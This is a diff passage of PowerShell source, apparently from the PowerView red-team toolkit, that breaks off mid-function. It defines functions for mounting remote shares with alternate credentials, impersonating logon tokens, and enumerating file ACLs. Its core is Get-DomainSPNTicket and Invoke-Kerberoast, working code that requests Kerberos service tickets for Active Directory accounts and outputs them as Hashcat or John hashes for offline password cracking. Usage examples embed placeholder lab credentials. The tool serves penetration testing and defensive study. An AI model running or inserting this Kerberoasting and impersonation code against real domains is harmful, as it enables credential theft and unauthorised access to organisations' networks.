+.PARAMETER Path + +Specifies the remote \\UNC\path to add the connection for. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +$Cred = Get-Credential +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\' -Credential $Cred + +.EXAMPLE + +$Cred = Get-Credential +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred +#> + + [CmdletBinding(DefaultParameterSetName = 'ComputerName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName, + + [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)] + [ValidatePattern('\\\\.*\\.*')] + [String[]] + $Path, + + [Parameter(Mandatory = $True)] + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential + ) + + BEGIN { + $NetResourceInstance = [Activator]::CreateInstance($NETRESOURCEW) + $NetResourceInstance.dwType = 1 + } + + PROCESS { + $Paths = @() + if ($PSBoundParameters['ComputerName']) { + ForEach ($TargetComputerName in $ComputerName) { + $TargetComputerName = $TargetComputerName.Trim('\') + $Paths += ,"\\$TargetComputerName\IPC$" + } + } + else { + $Paths += ,$Path + } + + ForEach ($TargetPath in $Paths) { + $NetResourceInstance.lpRemoteName = $TargetPath + Write-Verbose "[Add-RemoteConnection] Attempting to mount: $TargetPath" + + # https://msdn.microsoft.com/en-us/library/windows/desktop/aa385413(v=vs.85).aspx + # CONNECT_TEMPORARY = 4 + $Result = $Mpr::WNetAddConnection2W($NetResourceInstance, $Credential.GetNetworkCredential().Password, $Credential.UserName, 4) + + if ($Result -eq 0) { + Write-Verbose "$TargetPath successfully mounted" + } + else { + Throw "[Add-RemoteConnection] error mounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)" + } + } + } +} + + +function Remove-RemoteConnection { +<# +.SYNOPSIS + +Destroys a 
connection created by New-RemoteConnection.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+.DESCRIPTION
+
+This function uses WNetCancelConnection2 to destroy a connection created by
+New-RemoteConnection. If a -Path isn't specified, a -ComputerName is required to
+'unmount' \\$ComputerName\IPC$.
+
+.PARAMETER ComputerName
+
+Specifies the system to remove a \\ComputerName\IPC$ connection for.
+
+.PARAMETER Path
+
+Specifies the remote \\UNC\path to remove the connection for.
+
+.EXAMPLE
+
+Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
+
+.EXAMPLE
+
+Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
+
+.EXAMPLE
+
+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
+ [CmdletBinding(DefaultParameterSetName = 'ComputerName')]
+ Param(
+ [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ComputerName', ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('HostName', 'dnshostname', 'name')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $ComputerName,
+
+ [Parameter(Position = 0, ParameterSetName = 'Path', Mandatory = $True)]
+ [ValidatePattern('\\\\.*\\.*')]
+ [String[]]
+ $Path
+ )
+
+ PROCESS {
+ $Paths = @()
+ if ($PSBoundParameters['ComputerName']) {
+ ForEach ($TargetComputerName in $ComputerName) {
+ $TargetComputerName = $TargetComputerName.Trim('\')
+ $Paths += ,"\\$TargetComputerName\IPC$"
+ }
+ }
+ else {
+ $Paths += ,$Path
+ }
+
+ ForEach ($TargetPath in $Paths) {
+ Write-Verbose "[Remove-RemoteConnection] Attempting to unmount: $TargetPath"
+ $Result = $Mpr::WNetCancelConnection2($TargetPath, 0, $True)
+
+ if ($Result -eq 0) {
+ Write-Verbose "$TargetPath successfully ummounted"
+ }
+ else {
+ Throw "[Remove-RemoteConnection] error unmounting $TargetPath : $(([ComponentModel.Win32Exception]$Result).Message)"
+ }
+ }
+ }
+}
+
+
+function Invoke-UserImpersonation {
+<#
+.SYNOPSIS
+
+Creates a new "runas /netonly" type logon and impersonates the token.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+.DESCRIPTION
+
+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
+to simulate "runas /netonly". The resulting token is then impersonated with
+ImpersonateLoggedOnUser() and the token handle is returned for later usage
+with Invoke-RevertToSelf.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object with alternate credentials
+to impersonate in the current thread space.
+
+.PARAMETER TokenHandle
+
+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
+is executed.
+
+.PARAMETER Quiet
+
+Suppress any warnings about STA vs MTA.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+
+.OUTPUTS
+
+IntPtr
+
+The TokenHandle result from LogonUser.
+#>
+
+ [OutputType([IntPtr])]
+ [CmdletBinding(DefaultParameterSetName = 'Credential')]
+ Param(
+ [Parameter(Mandatory = $True, ParameterSetName = 'Credential')]
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential,
+
+ [Parameter(Mandatory = $True, ParameterSetName = 'TokenHandle')]
+ [ValidateNotNull()]
+ [IntPtr]
+ $TokenHandle,
+
+ [Switch]
+ $Quiet
+ )
+
+ if (([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') -and (-not $PSBoundParameters['Quiet'])) {
+ Write-Warning "[Invoke-UserImpersonation] powershell.exe is not currently in a single-threaded apartment state, token impersonation may not work."
+ }
+
+ if ($PSBoundParameters['TokenHandle']) {
+ $LogonTokenHandle = $TokenHandle
+ }
+ else {
+ $LogonTokenHandle = [IntPtr]::Zero
+ $NetworkCredential = $Credential.GetNetworkCredential()
+ $UserDomain = $NetworkCredential.Domain
+ $UserName = $NetworkCredential.UserName
+ Write-Warning "[Invoke-UserImpersonation] Executing LogonUser() with user: $($UserDomain)\$($UserName)"
+
+ # LOGON32_LOGON_NEW_CREDENTIALS = 9, LOGON32_PROVIDER_WINNT50 = 3
+ # this is to simulate "runas.exe /netonly" functionality
+ $Result = $Advapi32::LogonUser($UserName, $UserDomain, $NetworkCredential.Password, 9, 3, [ref]$LogonTokenHandle);$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+ if (-not $Result) {
+ throw "[Invoke-UserImpersonation] LogonUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+ }
+
+ # actually impersonate the token from LogonUser()
+ $Result = $Advapi32::ImpersonateLoggedOnUser($LogonTokenHandle)
+
+ if (-not $Result) {
+ throw "[Invoke-UserImpersonation] ImpersonateLoggedOnUser() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+
+ Write-Verbose "[Invoke-UserImpersonation] Alternate credentials successfully impersonated"
+ $LogonTokenHandle
+}
+
+
+function Invoke-RevertToSelf {
+<#
+.SYNOPSIS
+
+Reverts any token impersonation.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+.DESCRIPTION
+
+This function uses RevertToSelf() to revert any impersonated tokens.
+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
+CloseHandle() is used to close the opened handle.
+
+.PARAMETER TokenHandle
+
+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$Token = Invoke-UserImpersonation -Credential $Cred
+Invoke-RevertToSelf -TokenHandle $Token
+#>
+
+ [CmdletBinding()]
+ Param(
+ [ValidateNotNull()]
+ [IntPtr]
+ $TokenHandle
+ )
+
+ if ($PSBoundParameters['TokenHandle']) {
+ Write-Warning "[Invoke-RevertToSelf] Reverting token impersonation and closing LogonUser() token handle"
+ $Result = $Kernel32::CloseHandle($TokenHandle)
+ }
+
+ $Result = $Advapi32::RevertToSelf();$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error();
+
+ if (-not $Result) {
+ throw "[Invoke-RevertToSelf] RevertToSelf() Error: $(([ComponentModel.Win32Exception] $LastError).Message)"
+ }
+
+ Write-Verbose "[Invoke-RevertToSelf] Token impersonation successfully reverted"
+}
+
+
+function Get-DomainSPNTicket {
+<#
+.SYNOPSIS
+
+Request the kerberos ticket for a specified service principal name (SPN).
+
+Author: machosec, Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf
+
+.DESCRIPTION
+
+This function will either take one/more SPN strings, or one/more PowerView.User objects
+(the output from Get-DomainUser) and will request a kerberos ticket for the given SPN
+using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
+portion of the ticket is then extracted and output in either crackable John or Hashcat
+format (deafult of Hashcat).
+
+.PARAMETER SPN
+
+Specifies the service principal name to request the ticket for.
+
+.PARAMETER User
+
+Specifies a PowerView.User object (result of Get-DomainUser) to request the ticket for.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'John'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote domain using Invoke-UserImpersonation.
+
+.EXAMPLE
+
+Get-DomainSPNTicket -SPN "HTTP/web.testlab.local"
+
+Request a kerberos service ticket for the specified SPN.
+
+.EXAMPLE
+
+"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-DomainSPNTicket
+
+Request kerberos service tickets for all SPNs passed on the pipeline.
+
+.EXAMPLE
+
+Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat JTR
+
+Request kerberos service tickets for all users with non-null SPNs and output in JTR format.
+
+.INPUTS
+
+String
+
+Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
+
+.INPUTS
+
+PowerView.User
+
+Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+#>
+
+ [OutputType('PowerView.SPNTicket')]
+ [CmdletBinding(DefaultParameterSetName = 'RawSPN')]
+ Param (
+ [Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidatePattern('.*/.*')]
+ [Alias('ServicePrincipalName')]
+ [String[]]
+ $SPN,
+
+ [Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
+ [Object[]]
+ $User,
+
+ [ValidateSet('John', 'Hashcat')]
+ [Alias('Format')]
+ [String]
+ $OutputFormat = 'Hashcat',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
+
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['User']) {
+ $TargetObject = $User
+ }
+ else {
+ $TargetObject = $SPN
+ }
+
+ ForEach ($Object in $TargetObject) {
+ if ($PSBoundParameters['User']) {
+ $UserSPN = $Object.ServicePrincipalName
+ $SamAccountName = $Object.SamAccountName
+ $DistinguishedName = $Object.DistinguishedName
+ }
+ else {
+ $UserSPN = $Object
+ $SamAccountName = 'UNKNOWN'
+ $DistinguishedName = 'UNKNOWN'
+ }
+
+ # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
+ if ($UserSPN -is [System.DirectoryServices.ResultPropertyValueCollection]) {
+ $UserSPN = $UserSPN[0]
+ }
+
+ try {
+ $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
+ }
+ catch {
+ Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
+ }
+ if ($Ticket) {
+ $TicketByteStream = $Ticket.GetRequest()
+ }
+ if ($TicketByteStream) {
+ $Out = New-Object PSObject
+
+ $TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
+
+ $Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
+ $Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
+ $Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName
+
+ # TicketHexStream == GSS-API Frame (see https://tools.ietf.org/html/rfc4121#section-4.1)
+ # No easy way to parse ASN1, so we'll try some janky regex to parse the embedded KRB_AP_REQ.Ticket object
+ if($TicketHexStream -match 'a382....3082....A0030201(?..)A1.{1,4}.......A282(?....)........(?.+)') {
+ $Etype = [Convert]::ToByte( $Matches.EtypeLen, 16 )
+ $CipherTextLen = [Convert]::ToUInt32($Matches.CipherTextLen, 16)-4
+ $CipherText = $Matches.DataToEnd.Substring(0,$CipherTextLen*2)
+
+ # Make sure the next field matches the beginning of the KRB_AP_REQ.Authenticator object
+ if($Matches.DataToEnd.Substring($CipherTextLen*2, 4) -ne 'A482') {
+ Write-Warning "Error parsing ciphertext for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq"
+ $Hash = $null
+ $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-',''))
+ } else {
+ $Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))"
+ $Out | Add-Member Noteproperty 'TicketByteHexStream' $null
+ }
+ } else {
+ Write-Warning "Unable to parse ticket structure for the SPN $($Ticket.ServicePrincipalName). Use the TicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq"
+ $Hash = $null
+ $Out | Add-Member Noteproperty 'TicketByteHexStream' ([Bitconverter]::ToString($TicketByteStream).Replace('-',''))
+ }
+
+ if($Hash) {
+ # JTR jumbo output format - $krb5tgs$SPN/machine.testlab.local:63386d22d359fe...
+ if ($OutputFormat -match 'John') {
+ $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
+ }
+ else {
+ if ($DistinguishedName -ne 'UNKNOWN') {
+ $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ }
+ else {
+ $UserDomain = 'UNKNOWN'
+ }
+
+ # hashcat output format - $krb5tgs$23$*user$realm$test/spn*$63386d22d359fe...
+ $HashFormat = "`$krb5tgs`$$($Etype)`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
+ }
+ $Out | Add-Member Noteproperty 'Hash' $HashFormat
+ }
+
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
+ $Out
+ }
+ }
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
+}
+
+
+function Invoke-Kerberoast {
+<#
+.SYNOPSIS
+
+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
+
+Author: Will Schroeder (@harmj0y), @machosec
+License: BSD 3-Clause
+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket
+
+.DESCRIPTION
+
+Uses Get-DomainUser to query for user accounts with non-null service principle
+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
+The ticket format can be specified with -OutputFormat .
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER OutputFormat
+
+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
+Defaults to 'Hashcat'.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Invoke-Kerberoast | fl
+
+Kerberoasts all found SPNs for the current domain, outputting to Hashcat format (default).
+
+.EXAMPLE
+
+Invoke-Kerberoast -Domain dev.testlab.local | fl
+
+Kerberoasts all found SPNs for the testlab.local domain, outputting to JTR
+format instead of Hashcat.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)
+Invoke-Kerberoast -Credential $Cred -Verbose -Domain testlab.local | fl
+
+Kerberoasts all found SPNs for the testlab.local domain using alternate credentials.
+
+.OUTPUTS
+
+PowerView.SPNTicket
+
+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.SPNTicket')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [ValidateSet('John', 'Hashcat')]
+ [Alias('Format')]
+ [String]
+ $OutputFormat = 'Hashcat',
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $UserSearcherArguments = @{
+ 'SPN' = $True
+ 'Properties' = 'samaccountname,distinguishedname,serviceprincipalname'
+ }
+ if ($PSBoundParameters['Domain']) { $UserSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $UserSearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['Credential']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
+ }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $UserSearcherArguments['Identity'] = $Identity }
+ Get-DomainUser @UserSearcherArguments | Where-Object {$_.samaccountname -ne 'krbtgt'} | Get-DomainSPNTicket -OutputFormat $OutputFormat
+ }
+
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
+}
+
+
+function Get-PathAcl {
+<#
+.SYNOPSIS
+
+Enumerates the ACL for a given file path.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
+
+.DESCRIPTION
+
+Enumerates the ACL for a specified file/folder path, and translates
+the access rules for each entry into readable formats. If -Credential is passed,
+Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
+
+.PARAMETER Path
+
+Specifies the local or remote path to enumerate the ACLs for.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target path.
+
+.EXAMPLE
+
+Get-PathAcl "\\SERVER\Share\"
+
+Returns ACLs for the given UNC share.
+
+.EXAMPLE
+
+gci .\test.txt | Get-PathAcl
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
+Get-PathAcl -Path "\\SERVER\Share\" -Credential $Cred
+
+.INPUTS
+
+String
+
+One of more paths to enumerate ACLs for.
+
+.OUTPUTS
+
+PowerView.FileACL
+
+A custom object with the full path and associated ACL entries.
+
+.LINK
+
+https://support.microsoft.com/en-us/kb/305144
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.FileACL')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('FullName')]
+ [String[]]
+ $Path,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+
+ function Convert-FileRight {
+ # From Ansgar Wiechers at http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights
+ [CmdletBinding()]
+ Param(
+ [Int]
+ $FSR
+ )
+
+ $AccessMask = @{
+ [uint32]'0x80000000' = 'GenericRead'
+ [uint32]'0x40000000' = 'GenericWrite'
+ [uint32]'0x20000000' = 'GenericExecute'
+ [uint32]'0x10000000' = 'GenericAll'
+ [uint32]'0x02000000' = 'MaximumAllowed'
+ [uint32]'0x01000000' = 'AccessSystemSecurity'
+ [uint32]'0x00100000' = 'Synchronize'
+ [uint32]'0x00080000' = 'WriteOwner'
+ [uint32]'0x00040000' = 'WriteDAC'
+ [uint32]'0x00020000' = 'ReadControl'
+ [uint32]'0x00010000' = 'Delete'
+ [uint32]'0x00000100' = 'WriteAttributes'
+ [uint32]'0x00000080' = 'ReadAttributes'
+ [uint32]'0x00000040' = 'DeleteChild'
+ [uint32]'0x00000020' = 'Execute/Traverse'
+ [uint32]'0x00000010' = 'WriteExtendedAttributes'
+ [uint32]'0x00000008' = 'ReadExtendedAttributes'
+ [uint32]'0x00000004' = 'AppendData/AddSubdirectory'
+ [uint32]'0x00000002' = 'WriteData/AddFile'
+ [uint32]'0x00000001' = 'ReadData/ListDirectory'
+ }
+
+ $SimplePermissions = @{
+ [uint32]'0x1f01ff' = 'FullControl'
+ [uint32]'0x0301bf' = 'Modify'
+ [uint32]'0x0200a9' = 'ReadAndExecute'
+ [uint32]'0x02019f' = 'ReadAndWrite'
+ [uint32]'0x020089' = 'Read'
+ [uint32]'0x000116' = 'Write'
+ }
+
+ $Permissions = @()
+
+ # get simple permission
+ $Permissions += $SimplePermissions.Keys | ForEach-Object {
+ if (($FSR -band $_) -eq $_) {
+ $SimplePermissions[$_]
+ $FSR = $FSR -band (-not $_)
+ }
+ }
+
+ # get remaining extended permissions
+ $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] }
+ ($Permissions | Where-Object {$_}) -join ','
+ }
+
+ $ConvertArguments = @{}
+ if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+
+ $MappedComputers = @{}
+ }
+
+ PROCESS {
+ ForEach ($TargetPath in $Path) {
+ try {
+ if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+ $HostComputer = (New-Object System.Uri($TargetPath)).Host
+ if (-not $MappedComputers[$HostComputer]) {
+ # map IPC$ to this computer if it's not already
+ Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+ $MappedComputers[$HostComputer] = $True
+ }
+ }
+
+ $ACL = Get-Acl -Path $TargetPath
+
+ $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
+ $SID = $_.IdentityReference.Value
+ $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments
+
+ $Out = New-Object PSObject
+ $Out | Add-Member Noteproperty 'Path' $TargetPath
+ $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)
+ $Out | Add-Member Noteproperty 'IdentityReference' $Name
+ $Out | Add-Member Noteproperty 'IdentitySID' $SID
+ $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType
+ $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL')
+ $Out
+ }
+ }
+ catch {
+ Write-Verbose "[Get-PathAcl] error: $_"
+ }
+ }
+ }
+
+ END {
+ # remove the IPC$ mappings
+ $MappedComputers.Keys | Remove-RemoteConnection
+ }
+}
+
+
+function Convert-LDAPProperty {
+<#
+.SYNOPSIS
+
+Helper that converts specific LDAP property result fields and outputs
+a custom psobject.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+.DESCRIPTION
+
+Converts a set of raw LDAP properties results from ADSI/LDAP searches
+into a proper PSObject. Used by several of the Get-Domain* function.
+
+.PARAMETER Properties
+
+Properties object to extract out LDAP fields for display.
+
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+A custom PSObject with LDAP hashtable properties translated.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('System.Management.Automation.PSCustomObject')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
+ [ValidateNotNullOrEmpty()]
+ $Properties
+ )
+
+ $ObjectProperties = @{}
+
+ $Properties.PropertyNames | ForEach-Object {
+ if ($_ -ne 'adspath') {
+ if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) {
+ # convert all listed sids (i.e. if multiple are listed in sidHistory)
+ $ObjectProperties[$_] = $Properties[$_] | ForEach-Object { (New-Object System.Security.Principal.SecurityIdentifier($_, 0)).Value }
+ }
+ elseif ($_ -eq 'grouptype') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $GroupTypeEnum
+ }
+ elseif ($_ -eq 'samaccounttype') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $SamAccountTypeEnum
+ }
+ elseif ($_ -eq 'objectguid') {
+ # convert the GUID to a string
+ $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
+ }
+ elseif ($_ -eq 'useraccountcontrol') {
+ $ObjectProperties[$_] = $Properties[$_][0] -as $UACEnum
+ }
+ elseif ($_ -eq 'ntsecuritydescriptor') {
+ # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+ $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+ if ($Descriptor.Owner) {
+ $ObjectProperties['Owner'] = $Descriptor.Owner
+ }
+ if ($Descriptor.Group) {
+ $ObjectProperties['Group'] = $Descriptor.Group
+ }
+ if ($Descriptor.DiscretionaryAcl) {
+ $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl
+ }
+ if ($Descriptor.SystemAcl) {
+ $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl
+ }
+ }
+ elseif ($_ -eq 'accountexpires') {
+ if ($Properties[$_][0] -gt [DateTime]::MaxValue.Ticks) {
+ $ObjectProperties[$_] = "NEVER"
+ }
+ else {
+ $ObjectProperties[$_] = [datetime]::fromfiletime($Properties[$_][0])
+ }
+ }
